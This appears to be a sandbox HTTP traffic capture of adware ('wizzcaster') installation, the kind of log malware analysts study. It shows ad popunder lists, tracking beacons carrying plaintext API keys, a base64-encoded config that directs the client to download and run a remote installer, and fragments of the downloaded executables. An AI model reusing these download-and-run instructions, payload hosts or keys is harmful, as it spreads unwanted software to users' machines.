Set-Cookie: laravel_session=eyJpdiI6ImlhQ3drT2Q0ejc5QWR2RUJxdlNaK3c9PSIsInZhbHVlIjoickRJbWFncTVtOWYycXVRYURXeVdkNWZKaGJ1R2hJa0xwVUVMWFd2OWdHbXAxRFpRK1YyR2NEd1pMMUNpYWJ0ZnhpdnMyWXV6ZFNcL3pzUWl4dXV3K1hRPT0iLCJtYWMiOiJmYWE5YTU3YjQ5YmViOGJkMWY0MjIyZjdjYTkxNWZhNTk2MmZiMmZlZTE5MDA2Yzk2MjhiMmE1NmZlZjg0YmYyIn0=; expires=Sat, 15-Oct-2016 08:08:00 GMT; Max-Age=7200; path=/; httponly

Content-Length: 135

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: application/json
{"username":"csdi","api_key":"56f25c2b4eced","wizztracki_user_name":"c
sdi","wizztracki_api_key":"e3b93cef-8bd4-11e5-8538-0cc47a47968c"}HTTP/
1.1 200 OK..Date: Sat, 15 Oct 2016 06:08:00 GMT..Server: Apache/2.4.10
 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=eyJpdi
I6ImlhQ3drT2Q0ejc5QWR2RUJxdlNaK3c9PSIsInZhbHVlIjoickRJbWFncTVtOWYycXVR
YURXeVdkNWZKaGJ1R2hJa0xwVUVMWFd2OWdHbXAxRFpRK1YyR2NEd1pMMUNpYWJ0Znhpdn
MyWXV6ZFNcL3pzUWl4dXV3K1hRPT0iLCJtYWMiOiJmYWE5YTU3YjQ5YmViOGJkMWY0MjIy
ZjdjYTkxNWZhNTk2MmZiMmZlZTE5MDA2Yzk2MjhiMmE1NmZlZjg0YmYyIn0=; expire
s=Sat, 15-Oct-2016 08:08:00 GMT; Max-Age=7200; path=/; httponly..Conte
nt-Length: 135..Keep-Alive: timeout=10, max=100..Connection: Keep-Aliv
e..Content-Type: application/json..{"username":"csdi","api_key":"56f25
c2b4eced","wizztracki_user_name":"csdi","wizztracki_api_key":"e3b93cef
-8bd4-11e5-8538-0cc47a47968c"}....


POST /api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0 HTTP/1.1

Content-Type: text/xml

Host: wizzcaster.com

Content-Length: 0

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:01 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=eyJpdiI6Im16N1h1VUxtTjErWDFlQW83bHZ3c2c9PSIsInZhbHVlIjoiUUNEUTJCcVFiK3hBWElTSkZlVWROMytDYktOa3VnNnU3b3QwaUFuOGw1VHZ2TllUMUpjamFZVlluT2UweDBQOFdRZCttUlgydTVKWFcxUFROYVwvNkl3PT0iLCJtYWMiOiJiZjcwNGFiNDE3NWM4MDU0YmU0ZGIyYTU5OTY3ZmE4NjhlMGJlODk2ZjllZGYxMGU3NDFjZjY2MDFlODE1OTc5In0=; expires=Sat, 15-Oct-2016 08:08:02 GMT; Max-Age=7200; path=/; httponly

Content-Length: 2168

Content-Type: application/json
{"time_between_prints":"10","print_list":[{"link":"http:\/\/VVV.xmedia
serve.com\/apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popund
er=1&direct=1","campaign_id":"68","campaign_config_id":"403","max_show
_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1"
,"chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:
00"},{"link":"http:\/\/syndication.exdynsrv.com\/splash.php?idzone=216
9829&type=8","campaign_id":"160","campaign_config_id":"513","max_show_
per_day_per_user":"8","max_show_per_day_total":"2147483647","ie":"1","
chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00
"},{"link":"http:\/\/onclickads.net\/afu.php?zoneid=718340","campaign_
id":"140","campaign_config_id":"477","max_show_per_day_per_user":"10",
"max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":
"1","start_time":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/6
38.reimsrvcm.com\/WhiteLabelBidRequestHandlerServlet?oid=638&width=1&h
eight=100&pubid=160157&tagid=925977&pstn=ENTER_PLACEMENT_ID_HERE&noaop
=1&revmod=INSERT_CONTENT_TYPE&encoded=1&cb=INSERT_CACHEBUSTER&keywords
=INSERT_COMMA_SEPARATED_KEYWORDS&cirf=","campaign_id":"165","campaign_
config_id":"524","max_show_per_day_per_user":"10","max_show_per_day_to
tal":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00
:00:00","end_time":"00:00:00"},{"link":"http:\/\/ads.ad4game.com\/www\
/delivery\/pu.php?zoneid=58740","campaign_id":"141","campaign_config_i
d":"478","max_show_per_day_per_user":"10","max_show_per_day_total"
<<< skipped >>>

GET /track/cmf/generic?ttd_pid=steelhouse&ttd_tpi=1 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: match.adsrvr.org

Connection: Keep-Alive

HTTP/1.1 302 Found

Cache-Control: private,no-cache, must-revalidate

Content-Type: text/html

Date: Sat, 15 Oct 2016 06:08:20 GMT

Location: hXXp://match.adsrvr.org/track/cmb/generic?ttd_pid=steelhouse&ttd_tpi=1

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"

Pragma: no-cache

Server: Microsoft-IIS/8.5

Set-Cookie: TDID=33c45c1d-e53f-4a55-9fc5-47ccb38928e6; domain=.adsrvr.org; expires=Sun, 15-Oct-2017 06:08:20 GMT; path=/

Set-Cookie: TDCPM=CAEYBSgCMgsI8tfL0oyzujQQBTgB; domain=.adsrvr.org; expires=Sun, 15-Oct-2017 06:08:20 GMT; path=/

X-AspNet-Version: 4.0.30319

Content-Length: 171

Connection: keep-alive
Redirecting to: <a href="hXXp://match.adsrvr.org/track/cmb/generic?
ttd_pid=steelhouse&ttd_tpi=1">hXXp://match.adsrvr.org/track/cmb/gen
eric?ttd_pid=steelhouse&ttd_tpi=1</a>....


GET /track/cmb/generic?ttd_pid=steelhouse&ttd_tpi=1 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: match.adsrvr.org

Connection: Keep-Alive

Cookie: TDID=33c45c1d-e53f-4a55-9fc5-47ccb38928e6; TDCPM=CAEYBSgCMgsI8tfL0oyzujQQBTgB

HTTP/1.1 302 Found

Cache-Control: private,no-cache, must-revalidate

Content-Type: text/html

Date: Sat, 15 Oct 2016 06:08:20 GMT

Location: hXXp://px.steelhousemedia.com/tdsync?tdid=33c45c1d-e53f-4a55-9fc5-47ccb38928e6

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"

Pragma: no-cache

Server: Microsoft-IIS/8.5

Set-Cookie: TDID=33c45c1d-e53f-4a55-9fc5-47ccb38928e6; domain=.adsrvr.org; expires=Sun, 15-Oct-2017 06:08:20 GMT; path=/

Set-Cookie: TDCPM=CAESGQoKc3RlZWxob3VzZRILCODFoKT2sro0EAUYBSABKAIyCwjy18vSjLO6NBAFOAE=; domain=.adsrvr.org; expires=Sun, 15-Oct-2017 06:08:20 GMT; path=/

X-AspNet-Version: 4.0.30319

Content-Length: 187

Connection: keep-alive
Redirecting to: <a href="hXXp://px.steelhousemedia.com/tdsync?tdid=
33c45c1d-e53f-4a55-9fc5-47ccb38928e6">hXXp://px.steelhousemedia.com
/tdsync?tdid=33c45c1d-e53f-4a55-9fc5-47ccb38928e6</a>HTTP/1.1 30
2 Found..Cache-Control: private,no-cache, must-revalidate..Content-Typ
e: text/html..Date: Sat, 15 Oct 2016 06:08:20 GMT..Location: hXXp://px
.steelhousemedia.com/tdsync?tdid=33c45c1d-e53f-4a55-9fc5-47ccb38928e6.
.P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"..P
ragma: no-cache..Server: Microsoft-IIS/8.5..Set-Cookie: TDID=33c45c1d-
e53f-4a55-9fc5-47ccb38928e6; domain=.adsrvr.org; expires=Sun, 15-Oct-2
017 06:08:20 GMT; path=/..Set-Cookie: TDCPM=CAESGQoKc3RlZWxob3VzZRILCO
DFoKT2sro0EAUYBSABKAIyCwjy18vSjLO6NBAFOAE=; domain=.adsrvr.org; expire
s=Sun, 15-Oct-2017 06:08:20 GMT; path=/..X-AspNet-Version: 4.0.30319..
Content-Length: 187..Connection: keep-alive..Redirecting to: <a hre
f="hXXp://px.steelhousemedia.com/tdsync?tdid=33c45c1d-e53f-4a55-9fc5-4
7ccb38928e6">hXXp://px.steelhousemedia.com/tdsync?tdid=33c45c1d-e53
f-4a55-9fc5-47ccb38928e6</a>..
<<< skipped >>>

GET /SiteSeal/gmogs_image_125-50_en_blue.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: seal.globalsign.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:15 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d9dd80a85cc8186fa0709703ac21924ae1476511695; expires=Sun, 15-Oct-17 06:08:15 GMT; path=/; domain=.globalsign.com; HttpOnly

ETag: W/"1651-1470642162000"

Last-Modified: Mon, 08 Aug 2016 07:42:42 GMT

Via: AX-CACHE-2.7:34

CF-Cache-Status: HIT

Expires: Sat, 15 Oct 2016 18:08:15 GMT

Cache-Control: public, max-age=43200

Server: cloudflare-nginx

CF-RAY: 2f2118721731293e-OTP

Content-Encoding: gzip
2c7.............T.n.0... .."..%.u...R$E..(....z.hi.2.I...$M...K....N.p
wvv...d4."... .....m..2.........". ?..I.0...I\...Z.3.............S..R.
.5.}.$.D....I.F..'......i.H...7*...1...G.Rd%.-.t.........8hU....<..
....:g.mCt........=...J...m.N..4EKt.......T...F.:..jo~.......h*x.K(m..
}.........l....o...%.8.......v .U..x<.:X......x<qh ...`/..G....d
<|=.w.=N..........J..$k.X..h..Jl......r.."...vR`[email protected]@.6......B
..Y.,t. c.E.=.w.....M..h...4.l....nH..2I.D...DJ......&..;a....;....q7%
FJVE..x....... ../".$.NrC...^.a.D..M....#.o...$..).j...@.....#5.?10...
.u. U.mS.%i[.e...AH....%.r.:...Q..)..ZK..4$1...........Y.....nZ....U.M
.=D.s..^R...sK{?.)pI...rC.Ck*.D.w'...[...q.8V........RK$p.U..Q.@. ...I
O7.c..'.....Q....E..%Z.js.....0..HTTP/1.1 200 OK..Date: Sat, 15 Oct 20
16 06:08:15 GMT..Content-Type: application/javascript..Transfer-Encodi
ng: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d9dd80a85cc8
186fa0709703ac21924ae1476511695; expires=Sun, 15-Oct-17 06:08:15 GMT; 
path=/; domain=.globalsign.com; HttpOnly..ETag: W/"1651-1470642162000"
..Last-Modified: Mon, 08 Aug 2016 07:42:42 GMT..Via: AX-CACHE-2.7:34..
CF-Cache-Status: HIT..Expires: Sat, 15 Oct 2016 18:08:15 GMT..Cache-Co
ntrol: public, max-age=43200..Server: cloudflare-nginx..CF-RAY: 2f2118
721731293e-OTP..Content-Encoding: gzip..2c7.............T.n.0... .."..
%.u...R$E..(....z.hi.2.I...$M...K....N.pwvv...d4."... .....m..2.......
..". ?..I.0...I\...Z.3.............S..R..5.}.$.D....I.F..'......i.H...
7*...1...G.Rd%.-.t.........8hU....<......:g.mCt........=...J...
<<< skipped >>>

POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:43 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=sl5ucekmbtc6gla27intee37b2; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzproduct_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:44 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=610e4otra85khpf9jlgjsfabl3; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:07:44 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=610
e4otra85khpf9jlgjsfabl3; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzproduct_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:44 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=v7e0gmt360fn9qaofbf5d8dc53; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:07:44 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=v7e
0gmt360fn9qaofbf5d8dc53; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzproduct_execute_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:45 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=uksc74fa2423s5pavgo46fptm0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_product_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:45 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=44m37uu7tbuhaqe81orsa495i6; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:07:45 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=44m
37uu7tbuhaqe81orsa495i6; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_product_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:49 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=a68gctlp0171l1g9r095011tj6; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:07:49 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=a68
gctlp0171l1g9r095011tj6; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_product_execute_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:55 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=nch3s5q8kdn5ir8mj5oa688t23; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzuninstaller_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:55 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=ng14caob0ci1mghn9du83um201; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:07:55 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=ng1
4caob0ci1mghn9du83um201; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzuninstaller_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:57 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=mprt3sut5it13i514s5idre4m2; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:07:57 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=mpr
t3sut5it13i514s5idre4m2; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_soundplus_coinis_3_done HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 59

Expect: 100-continue

HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:59 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=tcpds11h4phab4fuv5op5dpra3; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:07:59 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=tcp
ds11h4phab4fuv5op5dpra3; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}..

POST /remotes_xml_sections.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: VVV.csdimonetize.com

Content-Length: 140

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



remote_id=3&user_name=csdi&api_key=azaez-azezae-azeaze-azeaze&buying_p
roduct_name=soundplus&buying_partner_name=coinis&buying_channel_name=3

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:14:25 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=48rgksqv8914lopgpj493cv2t4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 608

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0id2luIiB2YWx1ZT0iaHR0cDovL2RsLmF6YWxlZS5zaXRlL2Rvd25sb2Fk
LzMvV2l6ekNhc3Rlckluc3RhbGxlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIC
8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0id2luIiB2YWx1ZT0id2FpdCIgcGFy
YW1zPSIgY3NkaSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9InBvcF9tb2R1bGUiIHZhbH
VlPSJ3aXp6Y2FzdGVyX3NpbmNlXzIwMTYwNTEwIi8 DQoNCjwvcGVyZm9ybT4NCg0KPGNv
bmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9InBvcF9tb2R1bGUiIHZhbH
VlPSJ3aXp6Y2FzdGVyX3NpbmNlXzIwMTYwNTEwIiBtYXRjaD0iZmFsc2UiLz4NCg0KPC9j
b25kaXRpb25zPg0KDQo8L3Rhc2s CjwvdXBkYXRlcz4KCgo=HTTP/1.1 200 OK..Date:
 Sat, 15 Oct 2016 06:14:25 GMT..Server: Apache/2.4.10 (Debian)..Set-Co
okie: PHPSESSID=48rgksqv8914lopgpj493cv2t4; path=/..Expires: Thu, 19 N
ov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalida
te, post-check=0, pre-check=0..Pragma: no-cache..Vary: Accept-Encoding
..Content-Length: 608..Keep-Alive: timeout=10, max=100..Connection: Ke
ep-Alive..Content-Type: text/html; charset=UTF-8..PHVwZGF0ZXMgcmVmcmVz
aD0iNjAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0id2luIi
B2YWx1ZT0iaHR0cDovL2RsLmF6YWxlZS5zaXRlL2Rvd25sb2FkLzMvV2l6ekNhc3Rlcklu
c3RhbGxlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIC8 DQo8cHJvY2VzcyB0eX
BlPSJzdGFydCIgbmFtZT0id2luIiB2YWx1ZT0id2FpdCIgcGFyYW1zPSIgY3NkaSIvPg0K
PG1vZCB0eXBlPSJhZGQiIG5hbWU9InBvcF9tb2R1bGUiIHZhbHVlPSJ3aXp6Y2FzdGVyX3
NpbmNlXzIwMTYwNTEwIi8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxt
b2QgdHlwZT0iY2hlY2siIG5hbWU9InBvcF9tb2R1bGUiIHZhbHVlPSJ3aXp6Y2FzdG
<<< skipped >>>

GET /download/3/wizzcaster.exe HTTP/1.1

Host: dl.wizzuniquify.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:57 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
3ac00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W................................. ........@.. .................
[email protected]............
....................... ..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@[email protected].....................
[email protected].......,|...8..........|5...F...
........................................(i...*...(....*.r...p(....r...
p(....&s....o....*....(....~....%-.&~..........s....%.....o....*..s...
......*..(....*.0...........o......o....r#..po....,........%..,.o.....
...s....(....r'..p(.....(......o........... ...........o....,.......X.
......i2..-..*..o........o....................io....&..(..........,...
o.......*........)........0..x......... .....%.1...(....}............%
.2...(....}.....(....s........{.....{....o....}.......{.....{....o....
}.....s....}....*Fs....%o....o....*..Fs....%o....o....*..:...(....(...
.*..0.._........{.....o.....s....%.{.....s..........io ....o!...%.jo".
..%o...........%....io....&.o#...o#....*.:...(....(....*..0..U.......s
....%.{.....s....%....io ...o!...%.jo"...%o...........%....io....&o#..
..{.....o$...*....0..J........o%...-.r1..ps&...z.o%....[.............o
'...((......%.X.....X...o%...2..*...0..`.......r...p... J......./..r..
.p..()...(*.... (..d/..r...p..()...(*.... ....()...(.......X....o 
<<< skipped >>>

GET /download/3/wizzcasterUninstaller.exe HTTP/1.1

Host: dl.wizzuniquify.com

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:58 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcasterUninstaller.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
33c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W.........."[email protected]^... ...`....@.. .................
...................@.................................(^..O....`.......
................`.......\.............................................
.. ............... ..H............text....>... ...@................
